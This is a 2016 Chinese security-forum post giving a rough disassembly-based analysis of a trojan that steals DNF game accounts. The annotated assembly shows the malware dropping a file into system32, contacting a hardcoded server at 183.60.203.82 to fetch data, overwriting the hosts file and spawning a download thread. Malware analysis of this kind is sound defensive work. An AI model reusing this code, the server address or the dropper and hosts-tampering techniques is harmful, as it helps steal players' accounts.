-
-
[原创]某游戏盗号木马粗略分析
-
发表于: 2016-11-12 15:19
-
00558333 E9 22F3EFFF jmp c1.0045765A;单步下面也一样 0045765A E8 21640000 call c1.0045DA80 0045765F E9 79FEFFFF jmp c1.004574DD 004574DD 6A 58 push 0x58 004574DF 68 30E14800 push c1.0048E130 004574E4 E8 D3450000 call c1.0045BABC
004108B0 55 push ebp 004108B1 8BEC mov ebp,esp 004108B3 83E4 F8 and esp,0xFFFFFFF8 004108B6 6A FF push -0x1 004108B8 68 BD4C4700 push dump1.00474CBD 004108BD 64:A1 00000000 mov eax,dword ptr fs:[0] 004108C3 50 push eax 004108C4 51 push ecx 004108C5 B8 80280000 mov eax,0x2880 004108CA E8 31B80400 call dump1.0045C100 004108CF A1 747A4900 mov eax,dword ptr ds:[0x497A74] 004108D4 33C4 xor eax,esp 004108D6 898424 7C280000 mov dword ptr ss:[esp+0x287C],eax 004108DD 56 push esi 004108DE 57 push edi 004108DF A1 747A4900 mov eax,dword ptr ds:[0x497A74] 004108E4 33C4 xor eax,esp 004108E6 50 push eax 004108E7 8D8424 90280000 lea eax,dword ptr ss:[esp+0x2890] 004108EE 64:A3 00000000 mov dword ptr fs:[0],eax 004108F4 8D4424 0C lea eax,dword ptr ss:[esp+0xC] 004108F8 50 push eax 004108F9 8BF9 mov edi,ecx 004108FB C74424 10 08000>mov dword ptr ss:[esp+0x10],0x8 00410903 C74424 14 FF000>mov dword ptr ss:[esp+0x14],0xFF 0041090B FF15 28604700 call dword ptr ds:[<&comctl32.InitCommonControls>; comctl32.InitCommonControlsEx 00410911 8BCF mov ecx,edi 00410913 E8 76450300 call dump1.00444E8E 00410918 6A 00 push 0x0 0041091A E8 FC550300 call dump1.00445F1B 0041091F 83C4 04 add esp,0x4 00410922 68 28E34700 push dump1.0047E328 ; UNICODE "DNF" 00410927 8BCF mov ecx,edi 00410929 E8 C05A0300 call dump1.004463EE 0041092E E8 4DCFFFFF call dump1.0040D880; 释放文件(函数内部流程见下文)
代码 : 0040D880 55 push ebp 0040D881 8BEC mov ebp,esp 0040D883 81EC 60020000 sub esp,0x260 0040D889 A1 747A4900 mov eax,dword ptr ds:[0x497A74] 0040D88E 33C5 xor eax,ebp 0040D890 8945 FC mov dword ptr ss:[ebp-0x4],eax 0040D893 53 push ebx 0040D894 56 push esi 0040D895 57 push edi 0040D896 8B3D F0624700 mov edi,dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA 0040D89C 68 2C010000 push 0x12C 0040D8A1 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130] 0040D8A7 50 push eax 0040D8A8 FFD7 call ed; 获取系统目录 0040D8AA 8B1D 38634700 mov ebx,dword ptr ds[<&kernel32.lstrcat>];kernel32.lstrcatA 0040D8B0 68 28DF4700 push dump1.0047DF28 ; ASCII "\dnfset.cyc" 0040D8B5 8D8D D0FEFFFF lea ecx,dword ptr ss:[ebp-0x130] 0040D8BB 51 push ecx 0040D8BC FFD3 call ebx 0040D8BE 6A 00 push 0x0 0040D8C0 6A 00 push 0x0 0040D8C2 6A 04 push 0x4 0040D8C4 6A 00 push 0x0 0040D8C6 6A 01 push 0x1 0040D8C8 68 00000080 push 0x80000000 0040D8CD 8D95 D0FEFFFF lea edx,dword ptr ss:[ebp-0x130] 0040D8D3 52 push edx 0040D8D4 FF15 EC624700 call dword ptr ds:[<&kernel32.CreateFileA>]; 释放dnfset.cyc到system32目录 0040D8DA 6A 00 push 0x0 0040D8DC 6A 00 push 0x0 0040D8DE 8BF0 mov esi,eax 0040D8E0 6A 00 push 0x0 0040D8E2 56 push esi 0040D8E3 FF15 E8624700 call dword ptr ds:[<&kernel32.SetFilePointer>]; kernel32.SetFilePointer 0040D8E9 6A 00 push 0x0 0040D8EB 8D85 A0FDFFFF lea eax,dword ptr ss:[ebp-0x260] 0040D8F1 50 push eax 0040D8F2 68 6C020000 push 0x26C 0040D8F7 68 28FA4900 push dump1.0049FA28 ; ASCII "http://183.60.203.82:5566/f/w11/get.asp" 0040D8FC 56 push esi 0040D8FD FF15 E4624700 call dword ptr ds:[<&kernel32.ReadFile>]; 从http://183.60.203.82:5566/f/w11/get.asp 读取信息 0040D903 56 push esi 0040D904 8B35 20634700 mov esi,dword ptr ds:[<&kernel32.CloseHandle>]; kernel32.CloseHandle 0040D90A FFD6 call esi 0040D90C E8 2FFFFFFF call dump1.0040D840 0040D911 68 2C010000 push 0x12C 0040D916 8D8D A4FDFFFF lea ecx,dword ptr ss:[ebp-0x25C] 0040D91C 51 push ecx 0040D91D FFD7 call edi 0040D91F 68 34DF4700 push dump1.0047DF34 ; ASCII "\drivers\etc\hosts" 0040D924 8D95 A4FDFFFF lea edx,dword ptr ss:[ebp-0x25C] 0040D92A 52 push edx 0040D92B FFD3 call ebx 0040D92D 6A 00 push 0x0 0040D92F 6A 00 push 0x0 0040D931 6A 02 push 0x2 0040D933 6A 00 push 0x0 0040D935 6A 01 push 0x1 0040D937 68 00000040 push 0x40000000 0040D93C 8D85 A4FDFFFF lea eax,dword ptr ss:[ebp-0x25C] 0040D942 50 push eax 0040D943 FF15 EC624700 call dword ptr ds:[<&kernel32.CreateFileA>]; 创建文件hosts于C:\WINDOWS\system32\drivers\etc目录 0040D949 50 push eax 0040D94A FFD6 call esi 0040D94C 8B4D FC mov ecx,dword ptr ss:[ebp-0x4] 0040D94F 5F pop edi 0040D950 5E pop esi 0040D951 33CD xor ecx,ebp 0040D953 5B pop ebx 0040D954 E8 0B9D0400 call dump1.00457664 0040D959 8BE5 mov esp,ebp 0040D95B 5D pop ebp 0040D95C C3 retn
00410933 8B35 D4624700 mov esi,dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA 00410939 68 2C010000 push 0x12C 0041093E 8D8C24 18220000 lea ecx,dword ptr ss:[esp+0x2218] 00410945 51 push ecx 00410946 6A 00 push 0x0 00410948 FFD6 call esi 0041094A 8D9424 14220000 lea edx,dword ptr ss:[esp+0x2214] 00410951 68 30E34700 push dump1.0047E330 ; ASCII "sockhelp" 00410956 52 push edx 00410957 E8 E4800400 call dump1.00458A40 ; 判断进程名是不是sockhelp32.exe? 0041095C 83C4 08 add esp,0x8 0041095F 85C0 test eax,eax 00410961 74 3A je short dump1.0041099D ; 如果是则不跳 00410963 8B35 DC624700 mov esi,dword ptr ds:[<&kernel32.CreateThread>] ; kernel32.CreateThread 00410969 6A 00 push 0x0 0041096B 6A 00 push 0x0 0041096D 6A 00 push 0x0 0041096F 68 B0E54000 push dump1.0040E5B0 00410974 6A 00 push 0x0 00410976 6A 00 push 0x0 00410978 FFD6 call esi 创建一个线程,地址40e5b0.获取主机地址 0041097A E8 71D6FFFF call dump1.0040DFF0 从网上下载文件(函数内部见下文)
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
